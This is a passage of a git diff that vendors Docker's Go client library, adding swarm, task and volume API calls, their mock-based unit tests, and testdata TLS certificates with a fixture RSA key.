+func (cli *Client) SwarmUpdate(ctx context.Context, version swarm.Version, swarm swarm.Spec, flags swarm.UpdateFlags) error { + query := url.Values{} + query.Set("version", strconv.FormatUint(version.Index, 10)) + query.Set("rotateWorkerToken", fmt.Sprintf("%v", flags.RotateWorkerToken)) + query.Set("rotateManagerToken", fmt.Sprintf("%v", flags.RotateManagerToken)) + query.Set("rotateManagerUnlockKey", fmt.Sprintf("%v", flags.RotateManagerUnlockKey)) + resp, err := cli.post(ctx, "/swarm/update", query, swarm, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/swarm_update_test.go b/vendor/github.com/docker/docker/client/swarm_update_test.go new file mode 100644 index 0000000000..3b23db078f --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_update_test.go @@ -0,0 +1,49 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" +) + +func TestSwarmUpdateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.SwarmUpdate(context.Background(), swarm.Version{}, swarm.Spec{}, swarm.UpdateFlags{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSwarmUpdate(t *testing.T) { + expectedURL := "/swarm/update" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := 
client.SwarmUpdate(context.Background(), swarm.Version{}, swarm.Spec{}, swarm.UpdateFlags{}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/task_inspect.go b/vendor/github.com/docker/docker/client/task_inspect.go new file mode 100644 index 0000000000..bc8058fc32 --- /dev/null +++ b/vendor/github.com/docker/docker/client/task_inspect.go @@ -0,0 +1,34 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types/swarm" + + "golang.org/x/net/context" +) + +// TaskInspectWithRaw returns the task information and its raw representation.. +func (cli *Client) TaskInspectWithRaw(ctx context.Context, taskID string) (swarm.Task, []byte, error) { + serverResp, err := cli.get(ctx, "/tasks/"+taskID, nil, nil) + if err != nil { + if serverResp.statusCode == http.StatusNotFound { + return swarm.Task{}, nil, taskNotFoundError{taskID} + } + return swarm.Task{}, nil, err + } + defer ensureReaderClosed(serverResp) + + body, err := ioutil.ReadAll(serverResp.body) + if err != nil { + return swarm.Task{}, nil, err + } + + var response swarm.Task + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&response) + return response, body, err +} diff --git a/vendor/github.com/docker/docker/client/task_inspect_test.go b/vendor/github.com/docker/docker/client/task_inspect_test.go new file mode 100644 index 0000000000..148cdad3a7 --- /dev/null +++ b/vendor/github.com/docker/docker/client/task_inspect_test.go @@ -0,0 +1,54 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestTaskInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, _, err := client.TaskInspectWithRaw(context.Background(), "nothing") + if err == nil || err.Error() != 
"Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestTaskInspect(t *testing.T) { + expectedURL := "/tasks/task_id" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(swarm.Task{ + ID: "task_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + taskInspect, _, err := client.TaskInspectWithRaw(context.Background(), "task_id") + if err != nil { + t.Fatal(err) + } + if taskInspect.ID != "task_id" { + t.Fatalf("expected `task_id`, got %s", taskInspect.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/task_list.go b/vendor/github.com/docker/docker/client/task_list.go new file mode 100644 index 0000000000..66324da959 --- /dev/null +++ b/vendor/github.com/docker/docker/client/task_list.go @@ -0,0 +1,35 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// TaskList returns the list of tasks. 
+func (cli *Client) TaskList(ctx context.Context, options types.TaskListOptions) ([]swarm.Task, error) { + query := url.Values{} + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParam(options.Filters) + if err != nil { + return nil, err + } + + query.Set("filters", filterJSON) + } + + resp, err := cli.get(ctx, "/tasks", query, nil) + if err != nil { + return nil, err + } + + var tasks []swarm.Task + err = json.NewDecoder(resp.body).Decode(&tasks) + ensureReaderClosed(resp) + return tasks, err +} diff --git a/vendor/github.com/docker/docker/client/task_list_test.go b/vendor/github.com/docker/docker/client/task_list_test.go new file mode 100644 index 0000000000..2a9a4c4346 --- /dev/null +++ b/vendor/github.com/docker/docker/client/task_list_test.go @@ -0,0 +1,94 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestTaskListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.TaskList(context.Background(), types.TaskListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestTaskList(t *testing.T) { + expectedURL := "/tasks" + + filters := filters.NewArgs() + filters.Add("label", "label1") + filters.Add("label", "label2") + + listCases := []struct { + options types.TaskListOptions + expectedQueryParams map[string]string + }{ + { + options: types.TaskListOptions{}, + expectedQueryParams: map[string]string{ + "filters": "", + }, + }, + { + options: types.TaskListOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "filters": `{"label":{"label1":true,"label2":true}}`, + }, + }, + } + for _, 
listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + content, err := json.Marshal([]swarm.Task{ + { + ID: "task_id1", + }, + { + ID: "task_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + tasks, err := client.TaskList(context.Background(), listCase.options) + if err != nil { + t.Fatal(err) + } + if len(tasks) != 2 { + t.Fatalf("expected 2 tasks, got %v", tasks) + } + } +} diff --git a/vendor/github.com/docker/docker/client/testdata/ca.pem b/vendor/github.com/docker/docker/client/testdata/ca.pem new file mode 100644 index 0000000000..ad14d47065 --- /dev/null +++ b/vendor/github.com/docker/docker/client/testdata/ca.pem @@ -0,0 +1,18 @@ +-----BEGIN CERTIFICATE----- +MIIC0jCCAbqgAwIBAgIRAILlP5WWLaHkQ/m2ASHP7SowDQYJKoZIhvcNAQELBQAw +EjEQMA4GA1UEChMHdmluY2VudDAeFw0xNjAzMjQxMDE5MDBaFw0xOTAzMDkxMDE5 +MDBaMBIxEDAOBgNVBAoTB3ZpbmNlbnQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAw +ggEKAoIBAQD0yZPKAGncoaxaU/QW9tWEHbrvDoGVF/65L8Si/jBrlAgLjhmmV1di +vKG9QPzuU8snxHro3/uCwyA6kTqw0U8bGwHxJq2Bpa6JBYj8N2jMJ+M+sjXgSo2t +E0zIzjTW2Pir3C8qwfrVL6NFp9xClwMD23SFZ0UsEH36NkfyrKBVeM8IOjJd4Wjs +xIcuvF3BTVkji84IJBW2JIKf9ZrzJwUlSCPgptRp4Evdbyp5d+UPxtwxD7qjW4lM +yQQ8vfcC4lKkVx5s/RNJ4fzd5uEgLdEbZ20qt7Zt/bLcxFHpUhH2teA0QjmrOWFh +gbL83s95/+hbSVhsO4hoFW7vTeiCCY4xAgMBAAGjIzAhMA4GA1UdDwEB/wQEAwIC +rDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBY51RHajuDuhO2 +tcm26jeNROzfffnjhvbOVPjSEdo9vI3JpMU/RuQw+nbNcLwJrdjL6UH7tD/36Y+q 
+NXH+xSIjWFH0zXGxrIUsVrvt6f8CbOvw7vD+gygOG+849PDQMbL6czP8rvXY7vZV +9pdpQfrENk4b5kePRW/6HaGSTvtgN7XOrYD9fp3pm/G534T2e3IxgYMRNwdB9Ul9 +bLwMqQqf4eiqqMs6x4IVmZUkGVMKiFKcvkNg9a+Ozx5pMizHeAezWMcZ5V+QJZVT +8lElSCKZ2Yy2xkcl7aeQMLwcAeZwfTp+Yu9dVzlqXiiBTLd1+LtAQCuKHzmw4Q8k +EvD5m49l +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/client/testdata/cert.pem b/vendor/github.com/docker/docker/client/testdata/cert.pem new file mode 100644 index 0000000000..9000ffb32b --- /dev/null +++ b/vendor/github.com/docker/docker/client/testdata/cert.pem @@ -0,0 +1,18 @@ +-----BEGIN CERTIFICATE----- +MIIC8DCCAdigAwIBAgIRAJAS1glgcke4q7eCaretwgUwDQYJKoZIhvcNAQELBQAw +EjEQMA4GA1UEChMHdmluY2VudDAeFw0xNjAzMjQxMDE5MDBaFw0xOTAzMDkxMDE5 +MDBaMB4xHDAaBgNVBAoME3ZpbmNlbnQuPGJvb3RzdHJhcD4wggEiMA0GCSqGSIb3 +DQEBAQUAA4IBDwAwggEKAoIBAQClpvG442dGEvrRgmCrqY4kBml1LVlw2Y7ZDn6B +TKa52+MuGDmfXbO1UhclNqTXjLgAwKjPz/OvnPRxNEUoQEDbBd+Xev7rxTY5TvYI +27YH3fMH2LL2j62jum649abfhZ6ekD5eD8tCn3mnrEOgqRIlK7efPIVixq/ZqU1H +7ez0ggB7dmWHlhnUaxyQOCSnAX/7nKYQXqZgVvGhDeR2jp7GcnhbK/qPrZ/mOm83 +2IjCeYN145opYlzTSp64GYIZz7uqMNcnDKK37ZbS8MYcTjrRaHEiqZVVdIC+ghbx +qYqzbZRVfgztI9jwmifn0mYrN4yt+nhNYwBcRJ4Pv3uLFbo7AgMBAAGjNTAzMA4G +A1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAA +MA0GCSqGSIb3DQEBCwUAA4IBAQDg1r7nksjYgDFYEcBbrRrRHddIoK+RVmSBTTrq +8giC77m0srKdh9XTVWK1PUbGfODV1oD8m9QhPE8zPDyYQ8jeXNRSU5wXdkrTRmmY +w/T3SREqmE7CObMtusokHidjYFuqqCR07sJzqBKRlzr3o0EGe3tuEhUlF5ARY028 +eipaDcVlT5ChGcDa6LeJ4e05u4cVap0dd6Rp1w3Rx1AYAecdgtgBMnw1iWdl/nrC +sp26ZXNaAhFOUovlY9VY257AMd9hQV7WvAK4yNEHcckVu3uXTBmDgNSOPtl0QLsL +Kjlj75ksCx8nCln/hCut/0+kGTsGZqdV5c6ktgcGYRir/5Hs +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/client/testdata/key.pem b/vendor/github.com/docker/docker/client/testdata/key.pem new file mode 100644 index 0000000000..c0869dfc1a --- /dev/null +++ b/vendor/github.com/docker/docker/client/testdata/key.pem @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- 
+MIIEowIBAAKCAQEApabxuONnRhL60YJgq6mOJAZpdS1ZcNmO2Q5+gUymudvjLhg5 +n12ztVIXJTak14y4AMCoz8/zr5z0cTRFKEBA2wXfl3r+68U2OU72CNu2B93zB9iy +9o+to7puuPWm34WenpA+Xg/LQp95p6xDoKkSJSu3nzyFYsav2alNR+3s9IIAe3Zl +h5YZ1GsckDgkpwF/+5ymEF6mYFbxoQ3kdo6exnJ4Wyv6j62f5jpvN9iIwnmDdeOa +KWJc00qeuBmCGc+7qjDXJwyit+2W0vDGHE460WhxIqmVVXSAvoIW8amKs22UVX4M +7SPY8Jon59JmKzeMrfp4TWMAXESeD797ixW6OwIDAQABAoIBAHfyAAleL8NfrtnR +S+pApbmUIvxD0AWUooispBE/zWG6xC72P5MTqDJctIGvpYCmVf3Fgvamns7EGYN2 +07Sngc6V3Ca1WqyhaffpIuGbJZ1gqr89u6gotRRexBmNVj13ZTlvPJmjWgxtqQsu +AvHsOkVL+HOGwRaaw24Z1umEcBVCepl7PGTqsLeJUtBUZBiqdJTu4JYLAB6BggBI +OxhHoTWvlNWwzezo2C/IXkXcXD/tp3i5vTn5rAXHSMQkdMAUh7/xJ73Fl36gxZhp +W7NoPKaS9qNh8jhs6p54S7tInb6+mrKtvRFKl5XAR3istXrXteT5UaukpuBbQ/5d +qf4BXuECgYEAzoOKxMee5tG/G9iC6ImNq5xGAZm0OnmteNgIEQj49If1Q68av525 +FioqdC9zV+blfHQqXEIUeum4JAou4xqmB8Lw2H0lYwOJ1IkpUy3QJjU1IrI+U5Qy +ryZuA9cxSTLf1AJFbROsoZDpjaBh0uUQkD/4PHpwXMgHu/3CaJ4nTEkCgYEAzVjE +VWgczWJGyRxmHSeR51ft1jrlChZHEd3HwgLfo854JIj+MGUH4KPLSMIkYNuyiwNQ +W7zdXCB47U8afSL/lPTv1M5+ZsWY6sZAT6gtp/IeU0Va943h9cj10fAOBJaz1H6M +jnZS4jjWhVInE7wpCDVCwDRoHHJ84kb6JeflamMCgYBDQDcKie9HP3q6uLE4xMKr +5gIuNz2n5UQGnGNUGNXp2/SVDArr55MEksqsd19aesi01KeOz74XoNDke6R1NJJo +6KTB+08XhWl3GwuoGL02FBGvsNf3I8W1oBAnlAZqzfRx+CNfuA55ttU318jDgvD3 +6L0QBNdef411PNf4dbhacQKBgAd/e0PHFm4lbYJAaDYeUMSKwGN3KQ/SOmwblgSu +iC36BwcGfYmU1tHMCUsx05Q50W4kA9Ylskt/4AqCPexdz8lHnE4/7/uesXO5I3YF +JQ2h2Jufx6+MXbjUyq0Mv+ZI/m3+5PD6vxIFk0ew9T5SO4lSMIrGHxsSzx6QCuhB +bG4TAoGBAJ5PWG7d2CyCjLtfF8J4NxykRvIQ8l/3kDvDdNrXiXbgonojo2lgRYaM +5LoK9ApN8KHdedpTRipBaDA22Sp5SjMcUE7A6q42PJCL9r+BRYF0foFQx/rqpCff +pVWKgwIPoKnfxDqN1RUgyFcx1jbA3XVJZCuT+wbMuDQ9nlvulD1W +-----END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/client/transport.go b/vendor/github.com/docker/docker/client/transport.go new file mode 100644 index 0000000000..f04e601649 --- /dev/null +++ b/vendor/github.com/docker/docker/client/transport.go @@ -0,0 +1,28 @@ +package client + +import ( + "crypto/tls" + "errors" + "net/http" +) + 
+var errTLSConfigUnavailable = errors.New("TLSConfig unavailable") + +// transportFunc allows us to inject a mock transport for testing. We define it +// here so we can detect the tlsconfig and return nil for only this type. +type transportFunc func(*http.Request) (*http.Response, error) + +func (tf transportFunc) RoundTrip(req *http.Request) (*http.Response, error) { + return tf(req) +} + +// resolveTLSConfig attempts to resolve the tls configuration from the +// RoundTripper. +func resolveTLSConfig(transport http.RoundTripper) *tls.Config { + switch tr := transport.(type) { + case *http.Transport: + return tr.TLSClientConfig + default: + return nil + } +} diff --git a/vendor/github.com/docker/docker/client/utils.go b/vendor/github.com/docker/docker/client/utils.go new file mode 100644 index 0000000000..23d520ecb8 --- /dev/null +++ b/vendor/github.com/docker/docker/client/utils.go @@ -0,0 +1,33 @@ +package client + +import ( + "github.com/docker/docker/api/types/filters" + "net/url" + "regexp" +) + +var headerRegexp = regexp.MustCompile(`\ADocker/.+\s\((.+)\)\z`) + +// getDockerOS returns the operating system based on the server header from the daemon. +func getDockerOS(serverHeader string) string { + var osType string + matches := headerRegexp.FindStringSubmatch(serverHeader) + if len(matches) > 0 { + osType = matches[1] + } + return osType +} + +// getFiltersQuery returns a url query with "filters" query term, based on the +// filters provided. 
+func getFiltersQuery(f filters.Args) (url.Values, error) { + query := url.Values{} + if f.Len() > 0 { + filterJSON, err := filters.ToParam(f) + if err != nil { + return query, err + } + query.Set("filters", filterJSON) + } + return query, nil +} diff --git a/vendor/github.com/docker/docker/client/version.go b/vendor/github.com/docker/docker/client/version.go new file mode 100644 index 0000000000..933ceb4a49 --- /dev/null +++ b/vendor/github.com/docker/docker/client/version.go @@ -0,0 +1,21 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ServerVersion returns information of the docker client and server host. +func (cli *Client) ServerVersion(ctx context.Context) (types.Version, error) { + resp, err := cli.get(ctx, "/version", nil, nil) + if err != nil { + return types.Version{}, err + } + + var server types.Version + err = json.NewDecoder(resp.body).Decode(&server) + ensureReaderClosed(resp) + return server, err +} diff --git a/vendor/github.com/docker/docker/client/volume_create.go b/vendor/github.com/docker/docker/client/volume_create.go new file mode 100644 index 0000000000..9620c87cbf --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_create.go @@ -0,0 +1,21 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + volumetypes "github.com/docker/docker/api/types/volume" + "golang.org/x/net/context" +) + +// VolumeCreate creates a volume in the docker host. 
+func (cli *Client) VolumeCreate(ctx context.Context, options volumetypes.VolumesCreateBody) (types.Volume, error) { + var volume types.Volume + resp, err := cli.post(ctx, "/volumes/create", nil, options, nil) + if err != nil { + return volume, err + } + err = json.NewDecoder(resp.body).Decode(&volume) + ensureReaderClosed(resp) + return volume, err +} diff --git a/vendor/github.com/docker/docker/client/volume_create_test.go b/vendor/github.com/docker/docker/client/volume_create_test.go new file mode 100644 index 0000000000..9f1b2540b5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_create_test.go @@ -0,0 +1,75 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + volumetypes "github.com/docker/docker/api/types/volume" + "golang.org/x/net/context" +) + +func TestVolumeCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.VolumeCreate(context.Background(), volumetypes.VolumesCreateBody{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestVolumeCreate(t *testing.T) { + expectedURL := "/volumes/create" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + + content, err := json.Marshal(types.Volume{ + Name: "volume", + Driver: "local", + Mountpoint: "mountpoint", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + volume, err := 
client.VolumeCreate(context.Background(), volumetypes.VolumesCreateBody{ + Name: "myvolume", + Driver: "mydriver", + DriverOpts: map[string]string{ + "opt-key": "opt-value", + }, + }) + if err != nil { + t.Fatal(err) + } + if volume.Name != "volume" { + t.Fatalf("expected volume.Name to be 'volume', got %s", volume.Name) + } + if volume.Driver != "local" { + t.Fatalf("expected volume.Driver to be 'local', got %s", volume.Driver) + } + if volume.Mountpoint != "mountpoint" { + t.Fatalf("expected volume.Mountpoint to be 'mountpoint', got %s", volume.Mountpoint) + } +} diff --git a/vendor/github.com/docker/docker/client/volume_inspect.go b/vendor/github.com/docker/docker/client/volume_inspect.go new file mode 100644 index 0000000000..3860e9b22c --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_inspect.go @@ -0,0 +1,38 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// VolumeInspect returns the information about a specific volume in the docker host. 
+func (cli *Client) VolumeInspect(ctx context.Context, volumeID string) (types.Volume, error) { + volume, _, err := cli.VolumeInspectWithRaw(ctx, volumeID) + return volume, err +} + +// VolumeInspectWithRaw returns the information about a specific volume in the docker host and its raw representation +func (cli *Client) VolumeInspectWithRaw(ctx context.Context, volumeID string) (types.Volume, []byte, error) { + var volume types.Volume + resp, err := cli.get(ctx, "/volumes/"+volumeID, nil, nil) + if err != nil { + if resp.statusCode == http.StatusNotFound { + return volume, nil, volumeNotFoundError{volumeID} + } + return volume, nil, err + } + defer ensureReaderClosed(resp) + + body, err := ioutil.ReadAll(resp.body) + if err != nil { + return volume, nil, err + } + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&volume) + return volume, body, err +} diff --git a/vendor/github.com/docker/docker/client/volume_inspect_test.go b/vendor/github.com/docker/docker/client/volume_inspect_test.go new file mode 100644 index 0000000000..0d1d118828 --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_inspect_test.go @@ -0,0 +1,76 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestVolumeInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.VolumeInspect(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestVolumeInspectNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, err := client.VolumeInspect(context.Background(), "unknown") + if err == nil || !IsErrVolumeNotFound(err) { + t.Fatalf("expected 
a volumeNotFound error, got %v", err) + } +} + +func TestVolumeInspect(t *testing.T) { + expectedURL := "/volumes/volume_id" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "GET" { + return nil, fmt.Errorf("expected GET method, got %s", req.Method) + } + content, err := json.Marshal(types.Volume{ + Name: "name", + Driver: "driver", + Mountpoint: "mountpoint", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + v, err := client.VolumeInspect(context.Background(), "volume_id") + if err != nil { + t.Fatal(err) + } + if v.Name != "name" { + t.Fatalf("expected `name`, got %s", v.Name) + } + if v.Driver != "driver" { + t.Fatalf("expected `driver`, got %s", v.Driver) + } + if v.Mountpoint != "mountpoint" { + t.Fatalf("expected `mountpoint`, got %s", v.Mountpoint) + } +} diff --git a/vendor/github.com/docker/docker/client/volume_list.go b/vendor/github.com/docker/docker/client/volume_list.go new file mode 100644 index 0000000000..32247ce115 --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_list.go @@ -0,0 +1,32 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types/filters" + volumetypes "github.com/docker/docker/api/types/volume" + "golang.org/x/net/context" +) + +// VolumeList returns the volumes configured in the docker host. 
+func (cli *Client) VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumesListOKBody, error) { + var volumes volumetypes.VolumesListOKBody + query := url.Values{} + + if filter.Len() > 0 { + filterJSON, err := filters.ToParamWithVersion(cli.version, filter) + if err != nil { + return volumes, err + } + query.Set("filters", filterJSON) + } + resp, err := cli.get(ctx, "/volumes", query, nil) + if err != nil { + return volumes, err + } + + err = json.NewDecoder(resp.body).Decode(&volumes) + ensureReaderClosed(resp) + return volumes, err +} diff --git a/vendor/github.com/docker/docker/client/volume_list_test.go b/vendor/github.com/docker/docker/client/volume_list_test.go new file mode 100644 index 0000000000..f29639be23 --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_list_test.go @@ -0,0 +1,98 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + volumetypes "github.com/docker/docker/api/types/volume" + "golang.org/x/net/context" +) + +func TestVolumeListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.VolumeList(context.Background(), filters.NewArgs()) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestVolumeList(t *testing.T) { + expectedURL := "/volumes" + + noDanglingFilters := filters.NewArgs() + noDanglingFilters.Add("dangling", "false") + + danglingFilters := filters.NewArgs() + danglingFilters.Add("dangling", "true") + + labelFilters := filters.NewArgs() + labelFilters.Add("label", "label1") + labelFilters.Add("label", "label2") + + listCases := []struct { + filters filters.Args + expectedFilters string + }{ + { + filters: filters.NewArgs(), + expectedFilters: "", + }, { + 
filters: noDanglingFilters, + expectedFilters: `{"dangling":{"false":true}}`, + }, { + filters: danglingFilters, + expectedFilters: `{"dangling":{"true":true}}`, + }, { + filters: labelFilters, + expectedFilters: `{"label":{"label1":true,"label2":true}}`, + }, + } + + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + actualFilters := query.Get("filters") + if actualFilters != listCase.expectedFilters { + return nil, fmt.Errorf("filters not set in URL query properly. Expected '%s', got %s", listCase.expectedFilters, actualFilters) + } + content, err := json.Marshal(volumetypes.VolumesListOKBody{ + Volumes: []*types.Volume{ + { + Name: "volume", + Driver: "local", + }, + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + volumeResponse, err := client.VolumeList(context.Background(), listCase.filters) + if err != nil { + t.Fatal(err) + } + if len(volumeResponse.Volumes) != 1 { + t.Fatalf("expected 1 volume, got %v", volumeResponse.Volumes) + } + } +} diff --git a/vendor/github.com/docker/docker/client/volume_prune.go b/vendor/github.com/docker/docker/client/volume_prune.go new file mode 100644 index 0000000000..a07e4ce637 --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_prune.go @@ -0,0 +1,36 @@ +package client + +import ( + "encoding/json" + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +// VolumesPrune requests the daemon to delete unused data +func (cli *Client) VolumesPrune(ctx context.Context, pruneFilters filters.Args) (types.VolumesPruneReport, error) { + var report types.VolumesPruneReport + + if 
err := cli.NewVersionError("1.25", "volume prune"); err != nil { + return report, err + } + + query, err := getFiltersQuery(pruneFilters) + if err != nil { + return report, err + } + + serverResp, err := cli.post(ctx, "/volumes/prune", query, nil, nil) + if err != nil { + return report, err + } + defer ensureReaderClosed(serverResp) + + if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil { + return report, fmt.Errorf("Error retrieving disk usage: %v", err) + } + + return report, nil +} diff --git a/vendor/github.com/docker/docker/client/volume_remove.go b/vendor/github.com/docker/docker/client/volume_remove.go new file mode 100644 index 0000000000..6c26575b49 --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_remove.go @@ -0,0 +1,21 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types/versions" + "golang.org/x/net/context" +) + +// VolumeRemove removes a volume from the docker host. +func (cli *Client) VolumeRemove(ctx context.Context, volumeID string, force bool) error { + query := url.Values{} + if versions.GreaterThanOrEqualTo(cli.version, "1.25") { + if force { + query.Set("force", "1") + } + } + resp, err := cli.delete(ctx, "/volumes/"+volumeID, query, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/volume_remove_test.go b/vendor/github.com/docker/docker/client/volume_remove_test.go new file mode 100644 index 0000000000..1fe657349a --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_remove_test.go @@ -0,0 +1,47 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestVolumeRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.VolumeRemove(context.Background(), "volume_id", false) + if err == nil || err.Error() != "Error response from daemon: 
